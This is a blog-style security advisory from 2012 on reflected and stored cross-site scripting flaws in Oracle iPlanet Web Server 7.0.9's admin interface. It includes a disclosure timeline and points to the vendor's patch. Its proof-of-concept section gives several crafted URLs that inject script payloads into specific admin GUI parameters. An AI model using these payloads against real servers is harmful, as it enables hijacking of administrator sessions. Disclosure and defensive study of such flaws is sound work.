facebook Password Reset Vulnerability Found in

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Saturday, 28 April 2012

Oracle iPlanet Web Server 7.0.9 Multiple Cross-Site Scripting (XSS) Vulnerabilities

Posted on 21:01 by freda
Description
Oracle iPlanet Web Server is a web server designed for medium and large business applications. Oracle iPlanet Web Server builds on the earlier Sun ONE Web Server, iPlanet Web Server, and Netscape Enterprise Server products.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple Cross-Site Scripting vulnerabilities in Oracle iPlanet Web Server. These issues were discovered in a default installation of Oracle iPlanet Web Server 7.0.9. Other earlier versions may also be affected.

Proof of concept
Reflected XSS
===========
  • http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc='"--></style></script><script>alert(/XSS/)</script>&versionFile=../version/copyright?__token__=&productNameHeight=42&productNameWidth=221
  • http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&versionFile=../version/copyright?__token__=&productNameHeight='"--></style></script><script>alert(/XSS/)</script>&productNameWidth=221
  • http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&versionFile=../version/copyright?__token__=&productNameHeight=42&productNameWidth='"--></style></script><script>alert(/XSS/)</script>

Stored XSS
=========
  • http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName='"--></style></script><script>alert(/Stored XSS 1/)</script>&helpFile=&pathPrefix=
  • http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName=admingui&helpFile=&pathPrefix='"--></style></script><script>alert(/Stored XSS 2/)</script>

To trigger Stored XSS:
=================
http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName=TESTING&helpFile=&pathPrefix=

Solution
Oracle has released patches which address these issues. Please see the references for more information.

References
Vendor URL: http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html#AppendixSUNS
Secunia: http://secunia.com/advisories/43942/

Disclosure Timeline
2011-03-29 - Vulnerabilities discovered.
2011-03-29 - Vulnerabilities reported to Secunia.
2011-04-07 - Secunia confirmed the vulnerabilities and contacted the vendor.
2012-04-17 - Patch released.
2012-04-18 - Advisory published by Secunia.
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Posted in Oracle, XSS | No comments
Newer Post Older Post Home

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • Pligg CMS 1.1.4 Cross-Site Scripting (XSS) Vulnerability
    Description Pligg is an open source CMS (Content Management System) that you can download and use for free. Pligg CMS provides social publis...
  • Facebook Bug #1: Arbitrary File Upload Vulnerability Found in attachments.facebook.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.f...
  • Sybase EAServer 6.3.1 Directory Traversal Vulnerability
    Description Sybase EAServer is the leading solution for distributed and Web-enabled PowerBuilder applications. EA Server can be used to run ...
  • FileCOPA FTP Server 5.02 Directory Traversal Vulnerability
    Description FileCOPA is a commercial FTP server for Windows that is available as shareware. Sow Ching Shiong, an independent vulnerability r...
  • Microsoft Bug #2: Blind SQL Injection Vulnerability Found in careers.microsoft.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered a Blind SQL Injection vulnerability in careers.microsof...
  • Facebook Bug #4: Password Reset Vulnerability Found in www.facebook.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered a Password Reset vulnerability in www.facebook.com, whi...
  • Trend Micro Control Manager 5.5 Directory Traversal Vulnerability
    Description Trend Micro Control Manager provides a convenient centralized security management console that is designed to minimize administr...
  • F-Secure Policy Manager Web Reporting 9.00.30231 Path Disclosure and Cross-Site Scripting (XSS) Vulnerability
    Description F-Secure Policy Manager Web Reporting allow administrators to identify computers that are unprotected or vulnerable to virus out...
  • Microsoft Bug #1: Cross-Site Scripting (XSS) Found in connect.microsoft.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in connect.m...
  • Oracle Secure Backup 10.3.0.3.0 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities
    Description Oracle Secure Backup is a general-purpose network data protection tool that simplifies and automates the backup and restore of f...

Categories

  • Adobe
  • Apache
  • Apple
  • Arbitrary File Upload
  • CSRF
  • Directory Traversal
  • F-Secure
  • Facebook
  • HP
  • Microsoft
  • Oracle
  • Password Reset
  • SQL Injection
  • Sybase
  • Symantec
  • Trend Micro
  • Twitter
  • XSS

Blog Archive

  • ►  2013 (1)
    • ►  January (1)
  • ▼  2012 (25)
    • ►  July (1)
    • ►  May (4)
    • ▼  April (20)
      • Twitter Bug #1: Cross-Site Scripting (XSS) Found i...
      • Apple Bug #1: Cross-Site Scripting (XSS) Found in ...
      • Oracle iPlanet Web Server 7.0.9 Multiple Cross-Sit...
      • Apache Camel 2.7.0 Multiple Cross-Site Scripting (...
      • HP System Management Homepage 6.2.2.7 Cross-Site R...
      • Joomla! CMS 2.5.1 Blind SQL Injection Vulnerability
      • Symantec IM Manager 8.4.17 SQL Injection and Cross...
      • Pligg CMS 1.1.4 Cross-Site Scripting (XSS) Vulnera...
      • Symantec Endpoint Protection Manager 11.0.6 Cross-...
      • Oracle Secure Backup 10.3.0.3.0 Cross-Site Request...
      • Trend Micro Control Manager 5.5 Directory Traversa...
      • Trend Micro Control Manager 5.5 Cross-Site Scripti...
      • Adobe ColdFusion 9.0.1.274733 Cross-Site Request F...
      • Sybase EAServer 6.3.1 Directory Traversal Vulnerab...
      • F-Secure Policy Manager Web Reporting 9.00.30231 P...
      • HP Power Manager 4.3.2 Cross-Site Request Forgery ...
      • PrestaShop 1.3.3 Cross-Site Scripting (XSS) Vulner...
      • CompleteFTP Server 4.0.2 Directory Traversal Vulne...
      • SnugServer FTP Server 4.3.0.126 Directory Traversa...
      • FileCOPA FTP Server 5.02 Directory Traversal Vulne...
Powered by Blogger.

About Me

freda
View my complete profile